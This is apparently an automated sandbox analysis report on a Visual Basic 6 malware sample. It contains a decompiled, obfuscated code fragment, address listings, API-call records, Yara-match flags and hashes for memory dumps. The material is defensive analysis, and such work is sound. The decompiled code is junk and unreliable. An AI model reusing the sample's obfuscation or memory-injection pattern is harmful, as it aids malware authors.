                							 *(_t262 - 0x6baa37dd) =  *(_t262 - 0x6baa37dd) ^ _t303;
                							goto L80;
                						}
                						L83:
                						asm("cdq");
                						return _t155;
                						L80:
                						asm("enter 0x9455, 0x50");
                						asm("rcr dword [edx-0xd], cl");
                						if(_t155 < 0x8801108a) {
                							goto L72;
                						} else {
                							asm("adc bh, 0x4c");
                							asm("invalid");
                							_t156 = _t155 + 0x56;
                							asm("loope 0xf");
                							_t155 = _t156 | 0xf5bc20e6;
                							asm("in eax, dx");
                							asm("cld");
                							asm("iretd");
                							asm("in eax, dx");
                							asm("popfd");
                							_t248 = _t246 - 1 - _t246 - 1;
                							asm("repne pop esp");
                							 *[fs:ebx] =  *[fs:ebx] + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							 *_t197 =  *_t197 + _t248;
                							_pop(_t272);
                							 *_t197 =  *_t197 + _t248;
                						}
                						goto L83;
                					}
                				}
                			}
                0x00401979
                0x00401979
                0x004019ea
                0x004019ea
                0x004019ec
                0x004019ee
                0x004019f0
                0x004019f1
                0x004019f1
                0x004019f5
                0x004019f6
                0x004019f7
                0x004019f8
                0x004019fa
                0x00000000
                0x004019fc
                0x004019fc
                0x004019fd
                0x004019fe
                0x00000000
                0x004019fe
                0x0040197b
                0x0040197b
                0x0040197d
                0x00401982
                0x00401984
                0x00401985
                0x00401987
                0x00401989
                0x00401989
                0x0040198a
                0x0040198d
                0x0040198f
                0x00401990
                0x00401990
                0x00401992
                0x00401993
                0x00401994
                0x00401996
                0x00401a0b
                0x00401a0b
                0x00401998
                0x00401998
                0x00401a03
                0x00401a03
                0x00401a04
                0x00401a04
                0x00401a04
                0x00401a07
                0x00000000
                0x00401a0a
                0x00401a0a
                0x00000000
                0x00401a0a
                0x0040199a
                0x0040199a
                0x0040199d
                0x0040199f
                0x004019af
                0x004019b0
                0x004019b5
                0x004019b7
                0x004019b9
                0x004019bb
                0x004019bd
                0x004019c3
                0x004019c5
                0x004019c6
                0x004019c8
                0x004019c9
                0x004019ca
                0x004019cb
                0x004019cc
                0x004019ce
                0x004019d0
                0x004019d0
                0x004019d3
                0x00401a48
                0x00401a49
                0x00401a4a
                0x00401a4b
                0x00401a4d
                0x00401a4f
                0x00000000
                0x004019d5
                0x004019d5
                0x004019d9
                0x00401a50
                0x00401a50
                0x00401a52
                0x00401a54
                0x00401a54
                0x00401a56
                0x00401a5a
                0x00401ac1
                0x00401ac4
                0x00401ac5
                0x00401ac9
                0x00000000
                0x00401a5c
                0x00401a5c
                0x00401a5d
                0x00401ad4
                0x00401ad6
                0x00000000
                0x00401a5f
                0x00401a5f
                0x00401aca
                0x00401aca
                0x00401ad0
                0x00401ad2
                0x00000000
                0x00401a61
                0x00401a61
                0x00401ad7
                0x00401ad7
                0x00401ad8
                0x00401ad9
                0x00401adc
                0x00401ade
                0x00401ae0
                0x00401ae2
                0x00401ae4
                0x00401ae6
                0x00401ae8
                0x00401aee
                0x00401af0
                0x00401af2
                0x00401af4
                0x00401af6
                0x00401af8
                0x00401afb
                0x00401afd
                0x00401aff
                0x00401b01
                0x00401b03
                0x00401b05
                0x00000000
                0x00401a63
                0x00401a63
                0x00401a64
                0x00401a65
                0x00401a9e
                0x00401a9e
                0x00401a9f
                0x00401aa0
                0x00401aa1
                0x00401aa4
                0x00401aa6
                0x00000000
                0x00401aa8
                0x00401aa8
                0x00401aa9
                0x00401aa9
                0x00401a67
                0x00401a67
                0x00401a69
                0x00401a6b
                0x00401a6e
                0x00401a6f
                0x00401a70
                0x00401a71
                0x00401a71
                0x00401a72
                0x00401a73
                0x00401a75
                0x00401a76
                0x00401a77
                0x00401a78
                0x00401a79
                0x00401a79
                0x00401a7a
                0x00401a80
                0x00401a81
                0x00401a83
                0x00401a85
                0x00401a87
                0x00401a89
                0x00401a8b
                0x00401a8d
                0x00401a8f
                0x00401a8f
                0x00401a8f
                0x00401a92
                0x00401a95
                0x00401b07
                0x00401b07
                0x00401b09
                0x00401b0b
                0x00401b0d
                0x00401b0d
                0x00401b0e
                0x00401b13
                0x00401b14
                0x00401a99
                0x00401a99
                0x00401a9b
                0x00401a9d
                0x00401a9d
                0x00401a9d
                0x00000000
                0x00401a9d
                0x00401a95
                0x00401a65
                0x00401a61
                0x00401a5f
                0x00401a5d
                0x004019db
                0x004019db
                0x00000000
                0x004019db
                0x004019d9
                0x004019d3
                0x00401998
                0x00401996
                0x00401979
                0x00401977
                0x00401b19
                0x00401b1f
                0x00401b25
                0x00401b2b
                0x00401b31
                0x00401b37
                0x00401b3d
                0x00401b43
                0x00401b49
                0x00401b4f
                0x00401b55
                0x00401b5b
                0x00401b61
                0x00401b69
                0x00401b6c
                0x00401bc3
                0x00401bc6
                0x00401bc9
                0x00401bcf
                0x00401bd0
                0x00401bd2
                0x00401bd2
                0x00401bd2
                0x00401bd4
                0x00401bd6
                0x00401bdc
                0x00401bde
                0x00401bdf
                0x00401be0
                0x00401be5
                0x00401be6
                0x00401be9
                0x00401bea
                0x00401bea
                0x00401bea
                0x00401bed
                0x00401bf2
                0x00401bf4
                0x00000000
                0x00000000
                0x00401bf6
                0x00401bf6
                0x00401bfd
                0x00401bfe
                0x00401bfe
                0x00401c00
                0x00401c01
                0x00401c01
                0x00401c02
                0x00401c09
                0x00401bea
                0x00401bea
                0x00401bed
                0x00401bf2
                0x00401bf4
                0x00000000
                0x00000000
                0x00401c0b
                0x00401c0b
                0x00401c10
                0x00401c12
                0x00401c12
                0x00401c13
                0x00401c17
                0x00401c19
                0x00401c1a
                0x00401c1c
                0x00401c1e
                0x00401c1e
                0x00401c21
                0x00401c22
                0x00401c28
                0x00401c29
                0x00000000
                0x00401c2b
                0x00401c2b
                0x00401c2c
                0x00401c2e
                0x00401c30
                0x00401c36
                0x00401c3c
                0x00401c3d
                0x00401c3f
                0x00401c45
                0x00401c45
                0x00401c4a
                0x00401c4f
                0x00401c4f
                0x00401c4f
                0x00401c51
                0x00401c54
                0x00401c57
                0x00401c58
                0x00000000
                0x00000000
                0x00401c58
                0x00000000
                0x00401c5a
                0x00401c5a
                0x00401c5a
                0x00401c5d
                0x00401c61
                0x00401c67
                0x00401c69
                0x00000000
                0x00401c69
                0x00401cc8
                0x00401cf1
                0x00401cf2
                0x00401c6c
                0x00401c6c
                0x00401c70
                0x00401c78
                0x00000000
                0x00401c7a
                0x00401c7a
                0x00401c7d
                0x00401c7f
                0x00401c83
                0x00401c84
                0x00401c8a
                0x00401c8b
                0x00401c8c
                0x00401c8d
                0x00401c8e
                0x00401c8f
                0x00401c91
                0x00401c93
                0x00401c97
                0x00401c9a
                0x00401c9d
                0x00401ca0
                0x00401ca3
                0x00401ca6
                0x00401ca9
                0x00401cac
                0x00401caf
                0x00401cb2
                0x00401cb5
                0x00401cb8
                0x00401cbb
                0x00401cbe
                0x00401cc1
                0x00401cc4
                0x00401cc6
                0x00401cc7
                0x00401cc7
                0x00000000
                0x00401c78
                0x00401bea

                APIs
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp
                Similarity
                • API ID: #100
                • String ID: VB5!6&*
                • API String ID: 1341478452-3593831657
                • Opcode ID: 58e9e3611f0641e3cb26b2b37caeb82ad5709eb3abb01cf2e33f3eaf2da68c3c
                • Instruction ID: 7cabbda699271f582ac02b3444e3d492df4f0d61ace822d2d73aa6ea3a2c206c
                • Opcode Fuzzy Hash: 58e9e3611f0641e3cb26b2b37caeb82ad5709eb3abb01cf2e33f3eaf2da68c3c
                • Instruction Fuzzy Hash: EA126D7244E3D08FD71BDB74C9A56A1BFB0EE1332431901DBC4C29F5A7D628285ACB66
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __vbaStrCopy.MSVBVM60 ref: 00411C00
                • #689.MSVBVM60(Afkappendes,bena,INEQUIVALENT), ref: 00411C35
                • __vbaStrMove.MSVBVM60 ref: 00411C40
                • __vbaStrCmp.MSVBVM60(00000000,00000000), ref: 00411C48
                • __vbaFreeStr.MSVBVM60 ref: 00411C5B
                • __vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00411C7C
                • __vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000014), ref: 00411CA7
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040D4B4,000000D8), ref: 00411CD5
                • __vbaStrMove.MSVBVM60 ref: 00411CE0
                • __vbaFreeObj.MSVBVM60 ref: 00411CE9
                • __vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00411D01
                • __vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000014), ref: 00411D26
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040D4B4,000000D0), ref: 00411D4C
                • __vbaStrMove.MSVBVM60 ref: 00411D57
                • __vbaFreeObj.MSVBVM60 ref: 00411D60
                • __vbaInStr.MSVBVM60(00000000,remises,Acromimia,FFDB7B0B), ref: 00411D76
                • __vbaFreeStr.MSVBVM60(00411DB3), ref: 00411DA6
                • __vbaFreeStr.MSVBVM60 ref: 00411DAB
                • __vbaFreeStr.MSVBVM60 ref: 00411DB0
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp
                Similarity
                • API ID: __vba$Free$CheckHresult$Move$New2$#689Copy
                • String ID: Acromimia$Afkappendes$INEQUIVALENT$bena$remises
                • API String ID: 3839436293-732248126
                • Opcode ID: f3c37e00f3e306cd35ff91caaa69af1e4225ccf7cbdff25733bb4cadba47d713
                • Instruction ID: 5603953f3659c2ea5684951d87b1877daed0438d1a2907edc010f749c56121df
                • Opcode Fuzzy Hash: f3c37e00f3e306cd35ff91caaa69af1e4225ccf7cbdff25733bb4cadba47d713
                • Instruction Fuzzy Hash: FF518371D002099FCB04DFA4DD89EDDBBB4FF18704F14852AE505B72A0D7786945CBA8
                Uniqueness

                Uniqueness Score: -1.00%

                Non-executed Functions

                Memory Dump Source
                • Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: f429094aa3bc507834a48b5875d2760bf58f38916a8190746bb397b12393f037
                • Instruction ID: 022b1e55da3cff9f9fd9001f9f734231a69046ee8ae87ff2d5fecd81cba67f3c
                • Opcode Fuzzy Hash: f429094aa3bc507834a48b5875d2760bf58f38916a8190746bb397b12393f037
                • Instruction Fuzzy Hash: 315104F3C2D55497C32A8E3CC8C39DB7BA4EA1567031909A6D8A19F643F6684C46DBD0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a5cde8cc94d66ec4929e00ac57a34f7a41a6707369ea0a20a1636b9b0539b599
                • Instruction ID: 8473640a0ec219354881083d1c1e2773992d608522ee5e719a608f4f4f03aa57
                • Opcode Fuzzy Hash: a5cde8cc94d66ec4929e00ac57a34f7a41a6707369ea0a20a1636b9b0539b599
                • Instruction Fuzzy Hash: A441D3F3D2C55447C3268E3CC8835EB7BE5EA0567031949A2D8A19FA43F1648D4396D0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 08cbd85fa2e47aea3a6e865d3f0c843a9bf160855ef929a1e35707f70132e3a5
                • Instruction ID: 871f121ed8a0d49351fea9c221f987392c6d469ec556ca2e17f9cbc97de5d42f
                • Opcode Fuzzy Hash: 08cbd85fa2e47aea3a6e865d3f0c843a9bf160855ef929a1e35707f70132e3a5
                • Instruction Fuzzy Hash: BC41CE73A1A152CFC719CF28C4920DEBFA1AF1A66035C51EBC4658F59BEB204842DBA0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: e4f6ea81806d42e3173f5b4ef64bc787df8c7d012890cd45772beeaff6d46ca6
                • Instruction ID: f3d6253f8135efc6155e8e990b65a9393935d053e2059246a9002c86f1fbf45d
                • Opcode Fuzzy Hash: e4f6ea81806d42e3173f5b4ef64bc787df8c7d012890cd45772beeaff6d46ca6
                • Instruction Fuzzy Hash: 4831AA73A2A652CBC31A8F34C4961CEFBA1EF1666436C45EBC4919F54BE7244482C7A0
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 436c4b9361ca8209c4a2ff79b522491dbd749d690b118e643939d643c662a08e
                • Instruction ID: cd1a6f10080b21a6482bc907f668a8429259921dc94c41a6016da3521c5fb006
                • Opcode Fuzzy Hash: 436c4b9361ca8209c4a2ff79b522491dbd749d690b118e643939d643c662a08e
                • Instruction Fuzzy Hash: D3316AB382D9948BC71A8F7480D30DB7FE0EF2575875885EAC4919F113EAA48A43CB80
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 6ddfc0d3e4b65f55dedd931724192b2d0f68d258dc8e906379828a885dc0851c
                • Instruction ID: 76dedc3e5475511e29509d9164a6baf246eff5e6a6e4181cd47bb464d503efff
                • Opcode Fuzzy Hash: 6ddfc0d3e4b65f55dedd931724192b2d0f68d258dc8e906379828a885dc0851c
                • Instruction Fuzzy Hash: 6031AAB29085018BC32A8F24C4C35DBBBF5EF196203594DDAC8D14F647FA648D83CB50
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a4a9f7cd06a8522ede59b952d0fccdca631bd20765e03f8830a7a0733b8c48fb
                • Instruction ID: f67233d8daea4375093bbd1edaee989250eacd35af33890214b773e64c98bb1e
                • Opcode Fuzzy Hash: a4a9f7cd06a8522ede59b952d0fccdca631bd20765e03f8830a7a0733b8c48fb
                • Instruction Fuzzy Hash: CF2107B391D9A08BC3268A34C0D30DB7BE0DF1566875D88EAC4919F517F6A88E43DA90
                Uniqueness

                Uniqueness Score: -1.00%

                Memory Dump Source
                • Source File: 00000000.00000002.591786294.0000000002240000.00000040.00000001.sdmp, Offset: 02240000, based on PE: false
                Yara matches
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d42e2f5ecb159710419c1255503f4b22a12d338324073de6179e1ccefee6fd47
                • Instruction ID: a4d18179f4c259b5adefa87353f51a855e222326304474ea8382d25b769345e6
                • Opcode Fuzzy Hash: d42e2f5ecb159710419c1255503f4b22a12d338324073de6179e1ccefee6fd47
                • Instruction Fuzzy Hash: D4213A72D1D5948BC70B8B34C4824DA7BF1DE0A66479848E6C4A19F707F6648D52CB94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __vbaStrCopy.MSVBVM60 ref: 00419250
                • __vbaRedim.MSVBVM60(00000880,00000010,?,00000000,00000001,00000003,00000000), ref: 00419267
                • __vbaVarMove.MSVBVM60 ref: 00419294
                • __vbaVarMove.MSVBVM60 ref: 004192C0
                • __vbaVarMove.MSVBVM60 ref: 004192DD
                • __vbaVarMove.MSVBVM60 ref: 00419306
                • #665.MSVBVM60(?,3F800000,?), ref: 00419315
                • __vbaErase.MSVBVM60(00000000,?), ref: 00419320
                • __vbaVarTstNe.MSVBVM60(?,?), ref: 00419341
                • __vbaFreeVar.MSVBVM60 ref: 0041934D
                • #594.MSVBVM60(?), ref: 0041936E
                • __vbaFreeVar.MSVBVM60 ref: 00419377
                • __vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 0041938F
                • __vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000014), ref: 004193B4
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040D4B4,00000130), ref: 004193DE
                • __vbaStrMove.MSVBVM60 ref: 004193ED
                • __vbaFreeObj.MSVBVM60 ref: 004193F6
                • __vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 0041940E
                • __vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000038,?,?,?,?,?,?,?,0000000A), ref: 0041947F
                • __vbaVar2Vec.MSVBVM60(?,0000000A,?,?,?,?,?,?,?,0000000A), ref: 0041948D
                • __vbaAryMove.MSVBVM60(?,?,?,?,?,?,?,?,?,0000000A), ref: 0041949B
                • __vbaFreeVar.MSVBVM60(?,?,?,?,?,?,?,0000000A), ref: 004194A4
                • __vbaAryDestruct.MSVBVM60(00000000,?,0041950B), ref: 004194F4
                • __vbaFreeStr.MSVBVM60 ref: 00419503
                • __vbaFreeStr.MSVBVM60 ref: 00419508
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp
                Similarity
                • API ID: __vba$FreeMove$CheckHresult$New2$#594#665CopyDestructEraseRedimVar2
                • String ID: AFSNRINGEN${
                • API String ID: 3074978736-1400725761
                • Opcode ID: 01c7fd2d8f9508aef1e4768e1a95c660f7fc7de075586256bcbb029a7d8cf52d
                • Instruction ID: 65680267fe084f5e12ae99c6a68d06d607c3314ff4c7c70a0b4cc4accb51b11c
                • Opcode Fuzzy Hash: 01c7fd2d8f9508aef1e4768e1a95c660f7fc7de075586256bcbb029a7d8cf52d
                • Instruction Fuzzy Hash: 43A129B1D002189FDB04DF98D988ADDBBB8FF48704F10816AF50ABB265D774A985CF94
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • __vbaStrCopy.MSVBVM60 ref: 00418753
                • __vbaAryConstruct2.MSVBVM60(?,0040D6D4,00000002), ref: 00418764
                • #610.MSVBVM60(?), ref: 00418774
                • #661.MSVBVM60(?,0040D6CC,00000000,3FF00000,?), ref: 00418789
                • #610.MSVBVM60(?), ref: 00418793
                • __vbaVarAdd.MSVBVM60(?,?,?,?), ref: 004187BF
                • __vbaVarTstNe.MSVBVM60(00000000), ref: 004187C6
                • __vbaFreeVarList.MSVBVM60(00000004,?,?,?,?), ref: 004187E4
                • __vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00418EBC
                • __vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000014), ref: 00418EE7
                • __vbaHresultCheckObj.MSVBVM60(00000000,00006B16,0040D4B4,00000108), ref: 00418F18
                • __vbaFreeObj.MSVBVM60 ref: 00418F1D
                • __vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00418F35
                • __vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000048), ref: 00418F5F
                • __vbaStrMove.MSVBVM60 ref: 00418F6A
                • __vbaFreeStr.MSVBVM60(00418FD9), ref: 00418FB9
                • __vbaFreeStr.MSVBVM60 ref: 00418FBE
                • __vbaAryDestruct.MSVBVM60(00000000,?), ref: 00418FD2
                Memory Dump Source
                • Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp
                Similarity
                • API ID: __vba$Free$CheckHresult$#610New2$#661Construct2CopyDestructListMove
                • String ID:
                • API String ID: 3190467145-0
                • Opcode ID: 22fbc4f28f525929b5c12ac0747ba9008e44ff7478529d79729aa2372ccc0f16
                • Instruction ID: 6eff67b4cdf663362589ff34cec9a6e33dabb2609f029bf74f62678cc4d9a6cb
                • Opcode Fuzzy Hash: 22fbc4f28f525929b5c12ac0747ba9008e44ff7478529d79729aa2372ccc0f16
                • Instruction Fuzzy Hash: 49428334A102098BCB04CF98C595ADDF3B1BF48304F24D26AD9257B365E771A946CFAA
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • #598.MSVBVM60 ref: 0041905B
                • __vbaVarDup.MSVBVM60 ref: 00419083
                • #632.MSVBVM60(?,?,00000002,00000002), ref: 00419097
                • __vbaVarTstNe.MSVBVM60(00008008,?), ref: 004190BC
                • __vbaFreeVarList.MSVBVM60(00000003,?,00000002,?), ref: 004190D3
                • #554.MSVBVM60 ref: 004190E5
                • __vbaOnError.MSVBVM60(00000000), ref: 004190EC
                • __vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00419104
                • __vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,0000004C), ref: 00419129
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040D4C4,00000024), ref: 00419157
                • __vbaStrMove.MSVBVM60 ref: 00419166
                • __vbaFreeObj.MSVBVM60 ref: 0041916F
                • __vbaFreeStr.MSVBVM60(004191B4), ref: 004191AD
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp
                Similarity
                • API ID: __vba$Free$CheckHresult$#554#598#632ErrorListMoveNew2
                • String ID: ANFLJNES$Bageevnes4
                • API String ID: 1363981936-648517204
                • Opcode ID: 991f5f2d640ac593d17d9036a01c29d17c1a7cea7e80638b0465890b0a294de9
                • Instruction ID: 9b5e1a3def9e682a9846f4dbae0801cb75faf5d1e32616014f77c334ff520968
                • Opcode Fuzzy Hash: 991f5f2d640ac593d17d9036a01c29d17c1a7cea7e80638b0465890b0a294de9
                • Instruction Fuzzy Hash: 1C412D71D00258AFDB10DFD4DA49ADDBBB8FB48B00F20851AF505B72A1C7785A49CF98
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • #685.MSVBVM60 ref: 00411E17
                • __vbaObjSet.MSVBVM60(?,00000000), ref: 00411E22
                • __vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040D664,0000001C), ref: 00411E49
                • __vbaFreeObj.MSVBVM60 ref: 00411E65
                • #593.MSVBVM60(?), ref: 00411E86
                • __vbaFreeVar.MSVBVM60 ref: 00411E91
                • __vbaNew2.MSVBVM60(0040D4A4,0041B360), ref: 00411EA9
                • __vbaHresultCheckObj.MSVBVM60(00000000,02CAE994,0040D494,00000014), ref: 00411ECE
                • __vbaHresultCheckObj.MSVBVM60(00000000,?,0040D4B4,000000B8), ref: 00411EF4
                • __vbaFreeObj.MSVBVM60 ref: 00411EF9
                • #570.MSVBVM60(00000035), ref: 00411F01
                Memory Dump Source
                • Source File: 00000000.00000002.591272798.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.591259855.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000000.00000002.591326633.000000000041B000.00000004.00020000.sdmp
                • Associated: 00000000.00000002.591343142.000000000041D000.00000002.00020000.sdmp
                Similarity
                • API ID: __vba$CheckFreeHresult$#570#593#685New2
                • String ID:
                • API String ID: 2374434628-0
                • Opcode ID: c86b08fdccf1781112ac0fbb660d04c2f1e601afe609297c30212b60d7c4bea7
                • Instruction ID: 2d3ab4484c85faee385e553c25c4ae2ba5d45658cfd2481dcc1f902c84381c1a
                • Opcode Fuzzy Hash: c86b08fdccf1781112ac0fbb660d04c2f1e601afe609297c30212b60d7c4bea7
                • Instruction Fuzzy Hash: 46317071900218AFCB10AFA4DD89EDEBBB8FF08740F24452AF605B71A0D7785485CB68
                Uniqueness

                Uniqueness Score: -1.00%

                Executed Functions

                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DD752A2
                Memory Dump Source
                • Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: 6b58c4ad359cdee73757472c3108f12da545007ee7a1cbf4a8816d7c7149142b
                • Instruction ID: 11062906f4846d98aac3095dc42089a12b1af6c9f881bd2caf94f2dc7a345ad5
                • Opcode Fuzzy Hash: 6b58c4ad359cdee73757472c3108f12da545007ee7a1cbf4a8816d7c7149142b
                • Instruction Fuzzy Hash: D351DFB1D103499FDB14CF99C884ADEBBB5FF48314F60862AE819AB210D771A885CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DD752A2
                Memory Dump Source
                • Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false
                Similarity
                • API ID: CreateWindow
                • String ID:
                • API String ID: 716092398-0
                • Opcode ID: c25b5a8e84311077696dcac20a23af3e74902d0b13f3d8788ef8e828b8199a0f
                • Instruction ID: d84dba00098d034f2a4b694063fe61d77399f380519632406833fa9d1ec1259b
                • Opcode Fuzzy Hash: c25b5a8e84311077696dcac20a23af3e74902d0b13f3d8788ef8e828b8199a0f
                • Instruction Fuzzy Hash: 8651DEB1D00349DFDB14CF99C884ADEBBB5FF48314F60826AE819AB210D775A845CF91
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • CallWindowProcW.USER32(?,?,?,?,?), ref: 1DD77CF9
                Memory Dump Source
                • Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false
                Similarity
                • API ID: CallProcWindow
                • String ID:
                • API String ID: 2714655100-0
                • Opcode ID: 5d5184030c69f8d93f51502a3eeb71fa53a5614162b7e15653607decea1281f3
                • Instruction ID: 2e30d6abf96f5c97ca81d515f651eb5010a0c494ac08ab858921e403b6d85829
                • Opcode Fuzzy Hash: 5d5184030c69f8d93f51502a3eeb71fa53a5614162b7e15653607decea1281f3
                • Instruction Fuzzy Hash: 0B414CB4900349DFDB14CF99C884BAABBF5FF88314F15C899E419AB321D374A845CBA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DD76DFF
                Memory Dump Source
                • Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: d864f4c84ccf94fda7211a48a7d6bf79fd23efc5663f3b7274118e2d08c39be8
                • Instruction ID: 7764220067755aa91e7be581ff0d44e7b11edadca4f7513174d52082f4755137
                • Opcode Fuzzy Hash: d864f4c84ccf94fda7211a48a7d6bf79fd23efc5663f3b7274118e2d08c39be8
                • Instruction Fuzzy Hash: 242123B5D002489FDB10CFA9D884AEEBFF5FB48314F14846AE814A7310D374AA54CFA1
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DD76DFF
                Memory Dump Source
                • Source File: 00000019.00000002.738141063.000000001DD70000.00000040.00000001.sdmp, Offset: 1DD70000, based on PE: false
                Similarity
                • API ID: DuplicateHandle
                • String ID:
                • API String ID: 3793708945-0
                • Opcode ID: e50a53022193747d1bbaeb74c66e79a4232fcbda73a27ace80b6d0fa99c04f29
                • Instruction ID: d5edb4036d28178ef6a55562edfbe4c5eb3ae055838c7a314a204c65b9b8a2a6
                • Opcode Fuzzy Hash: e50a53022193747d1bbaeb74c66e79a4232fcbda73a27ace80b6d0fa99c04f29
                • Instruction Fuzzy Hash: 5021F3B5D002089FDB00CFA9D884AEEBBF8FB48324F14841AE914A7310D375A954CFA5
                Uniqueness

                Uniqueness Score: -1.00%

                APIs
                • RtlEncodePointer.NTDLL(00000000), ref: 1DD7BE72
                Memory Dump Source
